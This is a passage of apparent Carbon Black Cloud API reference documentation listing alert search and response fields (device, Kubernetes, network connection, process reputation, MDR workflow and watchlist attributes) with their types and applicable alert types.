device_os_version | Searchable Array. The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later. | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_policy | Searchable Array. Device policy | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
device_policy_id | Searchable Array. Device policy id | Integer | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_target_value | Searchable Array, Sortable. Target value assigned to the device, set from the policy | String: LOW, MEDIUM, HIGH, MISSION_CRITICAL | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_uem_id | Searchable Array. Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_username | Searchable Array. Users or device owners of alerts | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
egress_group_id | Searchable Array. Unique identifier for the egress group | String | CONTAINER_RUNTIME |
egress_group_name | Searchable Array. Name of the egress group | String | CONTAINER_RUNTIME |
external_device_friendly_name | Searchable Array. Human-readable external device names | String | DEVICE_CONTROL FACET |
first_event_timestamp | Searchable Time Range, Sortable. Timestamp when the first event in the alert occurred | ISO 8601 UTC Date String. Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
id | Searchable Array. Unique IDs of alerts | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
ioc_field | The field the indicator of compromise (IOC) hit contains | String | WATCHLIST |
ioc_hit | IOC field value or IOC query that matches | String | WATCHLIST |
ioc_id | Unique identifier of the IOC that generated the watchlist hit | String | WATCHLIST |
ip_reputation | Searchable Array. Range of reputations to accept for the remote IP: 0: unknown; 1-20: high risk; 21-40: suspicious; 41-60: moderate; 61-80: low risk; 81-100: trustworthy. There must be two values in this list. The first is the lower end of the range (inclusive), the second is the upper end of the range (inclusive) | Integer | CONTAINER_RUNTIME |
is_updated | Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, will generate a new copy of the alert, but is_updated will be set to false. | Boolean | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
k8s_cluster | Searchable Array. K8s Cluster name | String | CONTAINER_RUNTIME FACET |
k8s_kind | Searchable Array. K8s Workload kind | String | CONTAINER_RUNTIME |
k8s_namespace | Searchable Array. K8s namespace | String | CONTAINER_RUNTIME FACET |
k8s_pod_name | Searchable Array. Name of the pod within a workload | String | CONTAINER_RUNTIME |
k8s_policy | Searchable Array. Name of the K8s policy | String | CONTAINER_RUNTIME FACET |
k8s_policy_id | Searchable Array. Unique identifier for the K8s policy | String | CONTAINER_RUNTIME FACET |
k8s_rule | Searchable Array. Name of the K8s policy rule | String | CONTAINER_RUNTIME FACET |
k8s_rule_id | Searchable Array. Unique identifier for the K8s policy rule | String | CONTAINER_RUNTIME FACET |
k8s_workload_name | Searchable Array, Sortable. K8s Workload Name | String | CONTAINER_RUNTIME FACET |
last_event_timestamp | Searchable Time Range, Sortable. Timestamp when the last event in the alert occurred | ISO 8601 UTC Date String. Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
mdr_alert | Searchable. Is the alert eligible for review by Carbon Black MDR Analysts? | Boolean | FACET |
mdr_alert_notes_present | Searchable. Customer visible notes at the alert level that were added by an MDR analyst | Boolean | |
mdr_determination | MDR-updatable classification of the alert | Nested Response Object | |
mdr_determination_change_timestamp | Searchable Time Range. When the last MDR classification change occurred | ISO 8601 UTC Date String. Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object | |
mdr_determination_value | Searchable. A record that identifies whether the alert was determined to represent a likely or unlikely threat. | String: NOT_ENOUGH_INFO, NOT_REVIEWED, NONE, UNLIKELY_THREAT, LIKELY_THREAT | FACET |
mdr_threat_notes_present | Searchable. Customer visible notes at the threat level that were added by an MDR analyst | Boolean | |
mdr_workflow | MDR-updatable workflow of the alert | Nested Response Object | |
mdr_workflow_change_timestamp | Searchable Time Range, Sortable. When the last MDR status change occurred | ISO 8601 UTC Date String. Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object | |
mdr_workflow_is_assigned | Searchable. | Boolean | |
mdr_workflow_status | Searchable Array. Primary value used to capture status change during an MDR Analyst's alert triage | String: UNCLAIMED, IN_PROGRESS, TRIAGE_COMPLETE, ACTION_REQUESTED, PENDING_RESPONSE, RESPONCE_RECEIVED | FACET |
minimum_severity | Searchable. Integer representation of severity of an Alert. Use in search criteria to limit the alerts returned to those with a severity higher than this value | Integer | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
ml_classification_anomalies |
List of anomalies associated with this Alert.
anomalous_field
The specific field that is exhibiting anomalous behavior; it helps identify the exact area where the anomaly has occurred. String anomalous_field_baseline_values - The normal or expected values for the data field; this helps quantify the anomaly’s significance. [ String ]
anomaly_name
The anomaly’s name. String anomalous_value
The actual value that was identified as an anomaly; this value contrasts with the baseline values. String |
Nested Response Object:
|
WATCHLIST |
ml_classification_final_verdict |
Searchable Array
Final verdict of the alert, based on the ML models that were used to make the prediction. |
String
NOT_CLASSIFIED
NOT_ANOMALOUS
ANOMALOUS |
WATCHLIST FACET |
ml_classification_global_prevalence |
Searchable Array
Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations. |
String
UNKNOWN
LOW
MEDIUM
HIGH |
WATCHLIST |
ml_classification_org_prevalence |
Searchable Array
Categories (low/medium/high) used to describe the prevalence of alerts within an organization. |
String
UNKNOWN
LOW
MEDIUM
HIGH |
WATCHLIST |
netconn_local_ip |
Searchable Array
IP address of the remote side of the network connection; stored as dotted decimal |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_ipv4 |
Searchable Array
IPv4 address of the local side of the network connection; stored as a dotted decimal. Only one of ipv4 and ipv6 fields will be populated. |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_ipv6 |
Searchable Array
IPv6 address of the local side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_local_port |
Searchable Array
TCP or UDP port used by the local side of the network connection |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_protocol |
Searchable Array
Network protocol of the network connection |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_domain |
Searchable Array
Domain name (FQDN) associated with the remote end of the network connection, if available |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ip |
Searchable Array
IP address of the remote side of the network connection; stored as dotted decimal |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ipv4 |
Searchable Array
IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of ipv4 and ipv6 fields will be populated. |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_ipv6 |
Searchable Array
IPv6 address of the remote side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
netconn_remote_port |
Searchable Array
TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME WATCHLIST INTRUSION_DETECTION_SYSTEM |
org_key |
Unique alphanumeric string that identifies your organization in the Carbon Black Cloud | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_cmdline |
Searchable Array
Command line of the parent process |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_effective_reputation |
Searchable Array
Effective reputation of the parent process; applied by the sensor when the event occurred |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
parent_guid |
Searchable Array
Unique process identifier assigned to the parent process |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_md5 |
Searchable Array
MD5 hash of the parent process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
parent_name |
Searchable Array
Filesystem path of the parent process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
parent_pid |
Searchable Array
Identifier assigned by the operating system to the parent process |
Integer
|
|
parent_reputation |
Searchable Array
Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
parent_sha256 |
Searchable Array
SHA-256 hash of the parent process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
parent_username |
Searchable Array
User context in which the parent process was executed |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
policy_applied |
Searchable Array
Indicates whether or not a policy has been applied to any event associated with this alert |
String
APPLIED
NOT_APPLIED |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
primary_event_id |
Searchable Array
ID of the primary event in the alert |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_cmdline |
Searchable Array
Command line executed by the actor process |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_effective_reputation |
Searchable Array
Effective reputation of the actor hash |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
process_guid |
Searchable Array
Guid of the process that has fired the alert (optional) |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_issuer |
Searchable Array
|
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_md5 |
Searchable Array
MD5 hash of the actor process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_name |
Searchable Array
Names of the processes associated with the alert |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
process_pid |
Searchable Array
PID of the process that has fired the alert (optional) |
Integer
|
|
process_publisher |
Searchable Array
|
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
process_reputation |
Searchable Array
Reputation of the actor process; applied when event is processed by the Carbon Black Cloud |
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
process_sha256 |
Searchable Array
SHA-256 hash of the actor process binary |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
process_username |
Searchable Array
User context in which the actor process was executed. macOS - all users for the PID for fork() and exec() transitions. Linux - process user for exec() events, but in a future sensor release can be multi-valued due to setuid(). |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
product_id |
Searchable Array
Product IDs that identify the USB devices |
String | DEVICE_CONTROL |
product_name |
Searchable Array
Product names that identify the USB devices |
String | DEVICE_CONTROL FACET |
reason |
A natural-language explanation of what occurred, why the alert was raised, and any action taken; usually 1 to 3 sentences. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
reason_code |
Searchable Array
A unique short-hand code or GUID identifying the particular alert reason |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
remote_is_private |
Searchable
Is the remote information private: true or false |
Boolean
|
CONTAINER_RUNTIME |
remote_k8s_kind |
Searchable Array
Kind of remote workload; set if the remote side is another workload in the same cluster |
String | CONTAINER_RUNTIME |
remote_k8s_namespace |
Searchable Array
Namespace within the remote workload’s cluster; set if the remote side is another workload in the same cluster |
String | CONTAINER_RUNTIME |
remote_k8s_pod_name |
Searchable Array
Remote workload pod name; set if the remote side is another workload in the same cluster |
String | CONTAINER_RUNTIME |
remote_k8s_workload_name |
Searchable Array
Name of the remote workload; set if the remote side is another workload in the same cluster |
String | CONTAINER_RUNTIME |
report_description |
Description of the watchlist report associated with the alert | String | WATCHLIST |
report_id |
Searchable Array
Report IDs that contained the IOC that caused a hit |
String | WATCHLIST |
report_link |
Searchable Array
Link of reports that contained the IOC that caused a hit |
String | WATCHLIST |
report_name |
Searchable Array
Name of the watchlist report |
String | WATCHLIST FACET |
report_tags |
Tags associated with the watchlist report | String[]
|
WATCHLIST |
rule_category_id |
Searchable Array
ID representing the category of the rule_id for certain alert types |
String | CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM FACET |
rule_config_category |
Searchable Array
Types of rule configs |
String | reserved for future use |
rule_id |
Searchable Array
ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts |
String
|
CB_ANALYTICS HOST_BASED_FIREWALL INTRUSION_DETECTION_SYSTEM FACET |
run_state |
Searchable Array
Whether the threat in the alert actually ran |
String
DID_NOT_RUN
RAN
UNKNOWN |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
sensor_action |
Searchable Array
Actions taken by the sensor, according to the rules of a policy |
String
ALLOW
ALLOW_AND_LOG
DENY
TERMINATE |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
serial_number |
Searchable Array
Serial numbers of the specific devices |
String | DEVICE_CONTROL |
severity |
Searchable - use minimum_severity
Sortable Integer representation of the impact of the alert if it is a true positive |
Integer
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
tags |
Searchable Array
Tags added to the threat ID of the alert |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
threat_hunt_id |
Searchable
ID of the threat hunt being conducted in your environment by Carbon Black MDR |
String | WATCHLIST |
threat_hunt_name |
Searchable
Name of the threat hunt being conducted in your environment by Carbon Black MDR. The status of a threat hunt can be either ongoing or completed |
String | WATCHLIST FACET |
threat_id |
Searchable Array
ID assigned to a group of alerts with common criteria, based on alert type |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
threat_name |
Searchable Array
Name of the threat |
String | INTRUSION_DETECTION_SYSTEM |
threat_notes_present |
Searchable
True if notes are present on the threat ID. False if notes are not present. |
Boolean
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
tms_rule_id |
Searchable Array
Detection ID |
String | INTRUSION_DETECTION_SYSTEM |
ttps |
Searchable Array
Other potential malicious activities involved in a threat |
String | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM |
type |
Searchable Array
Type of alert generated |
String
CB_ANALYTICS
WATCHLIST
DEVICE_CONTROL
CONTAINER_RUNTIME
HOST_BASED_FIREWALL
INTRUSION_DETECTION_SYSTEM
NETWORK_TRAFFIC_ANALYSIS |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
user_update_timestamp |
Searchable Time Range
Sortable Timestamp of the last change to an alert property made by a user, such as the alert workflow or determination |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
vendor_id |
Searchable Array
IDs of the vendors who produced the devices |
String | DEVICE_CONTROL |
vendor_name |
Searchable Array
Names of the vendors who produced the devices |
String | DEVICE_CONTROL FACET |
watchlists |
List of watchlists associated with an alert. Alerts are batched hourly | Nested Response Object:
|
WATCHLIST |
watchlists_id |
Searchable Array
|
String | WATCHLIST |
watchlists_name |
Searchable Array
|
String | WATCHLIST FACET |
workflow |
Current workflow state of an alert. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route. |
Nested Response Object:
|
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
workflow_change_timestamp |
Searchable Time Range
Sortable When the last status change occurred |
ISO 8601 UTC Date String
Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
workflow_changed_by |
Who (or what) made the last status change | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
workflow_changed_by_type |
Searchable Array
|
String
SYSTEM
USER
API
AUTOMATION |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
workflow_closure_reason |
Searchable Array
A more detailed description of why the alert was resolved |
String
NO_REASON
RESOLVED
RESOLVED_BENIGN_KNOWN_GOOD
DUPLICATE_CLEANUP
OTHER |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
workflow_status |
Searchable Array
Primary value used to determine whether the alert is active or inactive; active alerts are displayed in the UI by default |
String
OPEN
IN_PROGRESS
CLOSED |
CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
Limitations
As with standard AND queries, when searching for field_1 = X and field_2 = Y, an event with only one of the two fields populated will not be returned.
Last modified on June 6, 2024